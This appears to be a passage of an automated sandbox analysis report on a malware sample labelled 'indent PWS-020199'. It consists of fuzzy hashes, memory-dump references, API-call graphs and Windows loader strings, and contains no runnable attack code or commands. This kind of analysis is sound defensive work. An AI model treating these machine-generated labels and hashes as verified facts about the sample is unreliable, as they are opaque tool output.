                            • Opcode Fuzzy Hash: d166d39be1ed9aab3da4f1a5058f3b074fc9e6101c4728ea6f9613c349d0d8bd
                            • Instruction Fuzzy Hash: 7BF06272404384AEE7218A5ADC84B62FFA8EF55734F18C95AED484F387C3799844CAB1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a422cde55756b8f07eefd8fd7fc01f986a30a46957868ce6df9de689f36624a
                            • Instruction ID: b759e676598b0f555b46453d0862b1f8146283a0dc8bd5a1926f19913e28aa9f
                            • Opcode Fuzzy Hash: 4a422cde55756b8f07eefd8fd7fc01f986a30a46957868ce6df9de689f36624a
                            • Instruction Fuzzy Hash: DEE1F775E002598FDB14DFA9C5809AEFBB2FF89304F248169D415AB356D734A942CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f431fe3e90e7e185500c2ae31307bc0afdf12d253264aa53461d52a2a486cfc9
                            • Instruction ID: 4d50d2004bbfe5bad2ff71aa0fe77dff3249a69afc6875db90228bdf90e42432
                            • Opcode Fuzzy Hash: f431fe3e90e7e185500c2ae31307bc0afdf12d253264aa53461d52a2a486cfc9
                            • Instruction Fuzzy Hash: ACE10974E102598FDB14DFA9C9809AEFBB2FF89304F248169D414AB356D734AD42CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b45961e57fda794295a7cb7095a3e6aca8f0330e3c02a6c841b6c161406b08ec
                            • Instruction ID: ad7ae215a337fef8ed169ce7bd8dda473656ea43f08bc1b943536b4d7490e1e8
                            • Opcode Fuzzy Hash: b45961e57fda794295a7cb7095a3e6aca8f0330e3c02a6c841b6c161406b08ec
                            • Instruction Fuzzy Hash: 5CA16D32E0025A8FCF05DFB4C9445DEBBB2FF85300B15856AE905AB269DB71E95ACB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 527bacf7cb5a371e184b32e20ecbe8672ad5b87a0c4569e7440c10482a794ae9
                            • Instruction ID: 291da139c0bf4b81a3a9b877b7bdfbea2934bc2bf16a7e708e90dda3ea9ac264
                            • Opcode Fuzzy Hash: 527bacf7cb5a371e184b32e20ecbe8672ad5b87a0c4569e7440c10482a794ae9
                            • Instruction Fuzzy Hash: 92511875E042598FDB14CFA9C9809AEFBF6FF89304F248169D418A7316D734A942CFA1

                            Execution Graph

                            Execution Coverage:1.2%
                            Dynamic/Decrypted Code Coverage:4.7%
                            Signature Coverage:8.8%
                            Total number of Nodes:148
                            Total number of Limit Nodes:12

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 70 4177a3-4177bf 71 4177c7-4177cc 70->71 72 4177c2 call 42df93 70->72 73 4177d2-4177e0 call 42e4b3 71->73 74 4177ce-4177d1 71->74 72->71 77 4177f0-417801 call 42c963 73->77 78 4177e2-4177ed call 42e753 73->78 83 417803-417817 LdrLoadDll 77->83 84 41781a-41781d 77->84 78->77 83->84
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417815
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 91 42b3b3-42b3ef call 404763 call 42c463 NtClose
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 105 14f2b60-14f2b6c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 107 14f2df0-14f2dfc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 106 14f2c70-14f2c7c LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 108 14f35c0-14f35cc LdrInitializeThunk
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 00413E3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(3e3-f82u,00000111,00000000,00000000), ref: 00413E3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: 3e3-f82u$3e3-f82u
                            • API String ID: 1836367815-3570064524

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 37 417823-41782d 38 417879-41787e 37->38 39 41782f-417832 37->39 42 417809-417817 LdrLoadDll 38->42 43 41787f-417880 38->43 40 417834-41784b 39->40 41 417859-417868 39->41 44 41784d-417856 40->44 49 41786a-417875 41->49 50 4178dd-4178e2 41->50 45 41781a-41781d 42->45 47 417881-4178a4 43->47 44->44 48 417858 44->48 51 4178d6-4178dc 47->51 48->41 49->47 52 417877-417878 49->52 53 417913 50->53 54 4178e4-4178e9 50->54 51->50 52->38 54->51 55 4178eb-417901 54->55
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %
                            • API String ID: 0-2567322570

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 56 42b713-42b754 call 404763 call 42c463 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B74F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: TeA
                            • API String ID: 3298025750-2376446362

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 86 42b6c3-42b707 call 404763 call 42c463 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(?,0041DFFB,?,?,00000000,?,0041DFFB,?,?,?), ref: 0042B702
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 96 42b763-42b79c call 404763 call 42c463 ExitProcess
                            APIs
                            • ExitProcess.KERNEL32(?,00000000,?,?,1F5ADF2D,?,?,1F5ADF2D), ref: 0042B797
                            Memory Dump Source
                            • Source File: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_indent PWS-020199.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 101 14f2c0a-14f2c0f 102 14f2c1f-14f2c26 LdrInitializeThunk 101->102 103 14f2c11-14f2c18 101->103
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2160512332
                            Strings
                            • Critical section debug info address, xrefs: 0152541F, 0152552E
                            • Critical section address., xrefs: 01525502
                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015254CE
                            • Address of the debug info found in the active list., xrefs: 015254AE, 015254FA
                            • double initialized or corrupted critical section, xrefs: 01525508
                            • Thread is in a state in which it cannot own a critical section, xrefs: 01525543
                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015254E2
                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0152540A, 01525496, 01525519
                            • 8, xrefs: 015252E3
                            • Critical section address, xrefs: 01525425, 015254BC, 01525534
                            • undeleted critical section in freed memory, xrefs: 0152542B
                            • Invalid debug info address of this critical section, xrefs: 015254B6
                            • corrupted critical section, xrefs: 015254C2
                            • Thread identifier, xrefs: 0152553A
                            Similarity
                            • API ID:
                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                            • API String ID: 0-2368682639
                            Strings
                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015225EB
                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01522602
                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015222E4
                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0152261F
                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01522409
                            • @, xrefs: 0152259B
                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01522412
                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01522624
                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015224C0
                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01522506
                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01522498
                            Similarity
                            • API ID:
                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                            • API String ID: 0-4009184096
                            Strings
                            Similarity
                            • API ID:
                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                            • API String ID: 0-2515994595
                            Strings
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            • API String ID: 0-1700792311
                            Strings
                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01538A3D
                            • AVRF: -*- final list of providers -*- , xrefs: 01538B8F
                            • VerifierDebug, xrefs: 01538CA5
                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01538A67
                            • VerifierDlls, xrefs: 01538CBD
                            • VerifierFlags, xrefs: 01538C50
                            • HandleTraces, xrefs: 01538C8F
                            Similarity
                            • API ID:
                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                            • API String ID: 0-3223716464
                            Strings
                            Similarity
                            • API ID:
                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                            • API String ID: 0-1109411897
                            Strings
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-792281065
                            Strings
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01509A2A
                            • apphelp.dll, xrefs: 014A6496
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01509A01
                            • minkernel\ntdll\ldrinit.c, xrefs: 01509A11, 01509A3A
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015099ED
                            • LdrpInitShimEngine, xrefs: 015099F4, 01509A07, 01509A30
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-204845295
                            Strings
                            • RtlGetAssemblyStorageRoot, xrefs: 01522160, 0152219A, 015221BA
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01522178
                            • SXS: %s() passed the empty activation context, xrefs: 01522165
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0152219F
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01522180
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015221BF
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            • API String ID: 0-861424205
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 01528177, 015281EB
                            • minkernel\ntdll\ldrredirect.c, xrefs: 01528181, 015281F5
                            • minkernel\ntdll\ldrinit.c, xrefs: 014EC6C3
                            • Loading import redirection DLL: '%wZ', xrefs: 01528170
                            • LdrpInitializeProcess, xrefs: 014EC6C4
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 015281E5
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            APIs
                              • Part of subcall function 014F2DF0: LdrInitializeThunk.NTDLL ref: 014F2DFA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BA3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BB6
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D60
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D74
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                            • String ID:
                            • API String ID: 1404860816-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            • API String ID: 0-379654539
                            Strings
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014E855E
                            • @, xrefs: 014E8591
                            • minkernel\ntdll\ldrinit.c, xrefs: 014E8421
                            • LdrpInitializeProcess, xrefs: 014E8422
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1918872054
                            Strings
                            • SXS: %s() passed the empty activation context, xrefs: 015221DE
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015222B6
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015221D9, 015222B1
                            • .Local, xrefs: 014E28D8
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            Strings
                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0152342A
                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01523437
                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01523456
                            • RtlDeactivateActivationContext, xrefs: 01523425, 01523432, 01523451
                            Similarity
                            • API ID:
                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                            • API String ID: 0-1245972979
                            Strings
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01510FE5
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0151106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015110AE
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01511028
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            • API String ID: 0-1468400865
                            Strings
                            • apphelp.dll, xrefs: 014D2462
                            • minkernel\ntdll\ldrinit.c, xrefs: 0151A9A2
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0151A992
                            • LdrpDynamicShimModule, xrefs: 0151A998
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-176724104
                            Strings
                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014C327D
                            • HEAP: , xrefs: 014C3264
                            • HEAP[%wZ]: , xrefs: 014C3255
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                            • API String ID: 0-617086771
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@
                            • API String ID: 0-1077428164
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            Strings
                            • LdrpCheckModule, xrefs: 0151A117
                            • minkernel\ntdll\ldrinit.c, xrefs: 0151A121
                            • Failed to allocated memory for shimmed module list, xrefs: 0151A10F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-161242083
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-1334570610
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 015282E8
                            • Failed to reallocate the system dirs string !, xrefs: 015282D7
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 015282DE
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            Strings
                            • PreferredUILanguages, xrefs: 0156C212
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0156C1C5
                            • @, xrefs: 0156C1F1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            Strings
                            • minkernel\ntdll\ldrredirect.c, xrefs: 01534899
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01534888
                            • LdrpCheckRedirection, xrefs: 0153488F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-2558761708
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 01532104
                            • Process initialization failed with status 0x%08lx, xrefs: 015320F3
                            • LdrpInitializationFailure, xrefs: 015320FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
